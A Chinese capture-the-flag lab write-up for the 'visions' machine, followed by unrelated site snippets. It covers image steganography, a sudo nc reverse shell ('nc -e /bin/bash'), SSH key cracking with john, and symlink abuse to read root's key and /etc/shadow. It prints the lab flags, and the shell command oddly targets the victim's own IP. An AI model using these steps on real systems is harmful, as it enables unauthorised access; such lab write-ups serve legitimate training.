visions-软链接提权

简介: visions-软链接提权


visions easy 图片隐写、图片调试、exiftool使用、sudo-nc提权、ssh私钥提权、ssh2john使用、john爆破私钥、ssh 私钥利用

主机发现

sudo netdiscover -i eth0 -r 192.168.44.136/24

服务扫描

sudo nmap -sV -A -T 4 -p- 192.168.44.136

目录扫描

右键检查查看源码,猜测是用户名alicia

 http://192.168.44.136/index.html
 
Only those that can see the invisible can do the imposible.
You have to be able to see what doesnt exist.
Only those that can see the invisible being able to see whats not there.
-alicia 

翻译

只有那些能看到无形事物的人才能做到不可能的事情。
你必须能够看到不存在的东西。
只有那些能够看到不可见事物的人才能看到不存在的事物。
-艾丽西亚

页面只有个white.png空白图片,猜测是图片隐写

保存下来

查看信息

exiftool white.png
strings white.png

得到: pw:ihaveadream

提权

┌──(kali㉿kali)-[~/下载]
└─$ ssh alicia@192.168.44.136 //ihaveadream

sudo -l //  (emma) NOPASSWD: /usr/bin/nc
sudo -u emma /usr/bin/nc -e /bin/bash 192.168.44.136 2333

新建一个控制台ssh连接,nc监听

nc -lvnp 2333

python3 -c 'import pty;pty.spawn("/bin/bash")'

emma@visions:~$ cat note.txt
cat note.txt
I cant help myself.
emma@visions:/home$ ls
ls
alicia  emma  isabella  sophia
emma@visions:/home$ cd sophia
cd sophia
emma@visions:/home/sophia$ ls
ls
flag.sh  user.txt
emma@visions:/home/sophia$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

可以看到home目录下还有好多其他用户,这里脑洞较为大,还得回到那张图片white.png

把它复制到windows的world里,图片格式–>矫正–>图片矫正选项–>对比度-56%,就能看到账户密码

sophia/seemstobeimpossible

获得第一个flag

emma@visions:/home/sophia$ su sophia
su sophia
Password: seemstobeimpossible

sophia@visions:~$ cat user.txt
cat user.txt
hmvicanseeforever

读取到ssh私钥

sudo -l //(ALL : ALL) NOPASSWD: /usr/bin/cat /home/isabella/.invisible
sudo /usr/bin/cat /home/isabella/.invisible

将私钥复制出来编辑到id_rsa,这登录还需要密码,我们使用 ssh2johnid_isa 秘钥信息 转换 为 john 可以识别的hash,然后进行爆破,得到密码是invisible

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ vim id_rsa
┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ ssh2john id_rsa >> hash  
┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

0g 0:00:05:24 0.06% (ETA: 2024-04-23 18:54) 0g/s 33.41p/s 33.41c/s 33.41C/s pink69..findingnemo
invisible        (id_rsa)   
chmod 600 id_rsa
┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ sudo ssh -i id_rsa isabella@192.168.44.136  //invisible

软链接提权

这里 sudo 具有root 的权限,sophia 用户具有使用 Sudo 读取 /home/isabella/.invisible 的权限,而现在的 isabella 用户有权限修改

/home/isabella/.invisible。我们尝试创建一条软链接,将.invisiblla文件链接到root的私钥上

isabella@visions:~$ cp .invisible .invisible.bak
isabella@visions:~$ rm -rf ./.invisible
isabella@visions:~$ ln -s /root/.ssh/id_rsa ./.invisible

sophia@visions:/home$ sudo /usr/bin/cat /home/isabella/.invisible

读取到root的私钥,获得第二个flag

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ vim root_rsa
                                                                             
┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ chmod 600 root_rsa    
                                                                             
┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ ssh -i root_rsa root@192.168.44.136                     
Linux visions 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 17 13:10:34 2024
root@visions:~# id
uid=0(root) gid=0(root) groups=0(root)
root@visions:~# ls
flag.sh  root.txt
root@visions:~# cat root.txt 
hmvitspossible

方法二

hadow爆破

使用上面的方法,换个思路,读取root的shadow 文件,然后进行爆破

isabella@visions:~$ ln -s /etc/shadow ./.invisible

这里太久了,了解思路即可。完全爆破需要很长时间。0.99%

相关文章
|
Java
手动将多个Jar包合并成1个Jar包
手动将多个Jar包合并成1个Jar包
413 0
|
SQL 消息中间件 Kafka
流数据湖平台Apache Paimon(二)集成 Flink 引擎
流数据湖平台Apache Paimon(二)集成 Flink 引擎
1647 0
|
10月前
|
PyTorch 算法框架/工具 芯片
新手入门:DGL在昇腾上的安装问题
本文介绍了在aarch64架构和Python 3.10环境下安装DGL(Deep Graph Library)的过程。首先通过`uname -a`确认硬件架构,接着使用`python --version`检查Python版本。为确保兼容性,从指定链接下载适合的whl包或通过pip安装dgl。过程中遇到了torchdata版本不兼容的问题,通过降级torchdata至0.7.1版本解决。此外,针对NPU芯片适配,重新安装了与CANN 8.0.RC2兼容的torch和torch_npu组件。最终成功导入dgl包并准备进行模型训练验证。
|
网络协议 Java 数据库连接
2023第二届陇剑杯网络安全大赛 预选赛复盘学到的一些经验
2023第二届陇剑杯网络安全大赛 预选赛复盘学到的一些经验
247 6
|
11月前
|
JSON Shell Linux
dockerfile 用法全解析
Dockerfile指令简介:`FROM`基于Alpine镜像;`WORKDIR`设置工作目录;`COPY`复制文件;`ADD`支持URL;`RUN`运行命令;`CMD`容器启动时执行;`ENTRYPOINT`与`CMD`组合执行;`EXPOSE`声明端口;`VOLUME`映射文件;`ENV`设置环境变量;`ARG`构建参数;`LABEL`元数据;`ONBUILD`触发命令;`STOPSIGNAL`停止信号;`HEALTHCHECK`健康检查;`SHELL`默认Shell。Alpine仅5M,小巧高效。
249 4
dockerfile 用法全解析
|
11月前
|
Ubuntu Linux 虚拟化
CentOS7扩容踩坑记录(最后只有ubuntu成功)
这篇博客记录了一次尝试给CentOS根分区扩容的过程。作者在VMware中扩展了虚拟磁盘,但最终未能成功将新分区合并到现有卷组中,因为原有分区未创建物理卷(PV)和卷组(VG)。过程中遇到了多个问题,如分区文件正在使用中等。最终作者提醒读者在操作前务必先检查当前的分区和卷组状态。
212 4
CentOS7扩容踩坑记录(最后只有ubuntu成功)
|
11月前
|
安全 Serverless API
aliyun多模态数据信息提取方案评测
该页面设计布局合理,左右分区呈现文档与操作区域,实现了理论指导与实际操作的紧密结合,极大提升了部署流程的便捷性和效率。关键步骤提供详细提示,降低用户学习成本和操作难度,尤其适合初次使用者。信息整合方便对比,减少错误,增强用户体验。整体简洁明了,鼓励自主操作,适用于新手和技术人员,显著提高了部署任务的流畅性和成功率。不足之处在于多模态数据融合处理和跨平台兼容性有待优化。
293 7
|
11月前
|
安全 程序员 PHP
实验室信创平台上几道经典的web-php有关的题目wp
本内容介绍了多个CTF题目及其解题思路,涵盖正则表达式、PHP函数、代码审计等方面。例如,通过POST提交和正则匹配获取flag,利用PHP的松散比较和数组特性绕过验证,以及通过恢复VIM临时文件和SVN隐藏文件夹获取关键信息。每个题目都提供了详细的解题步骤和相关链接,适合初学者学习和实践。
165 1
|
Web App开发 监控 JavaScript
Vue 3 的内存管理
【5月更文挑战第31天】Vue 3 的内存管理
389 2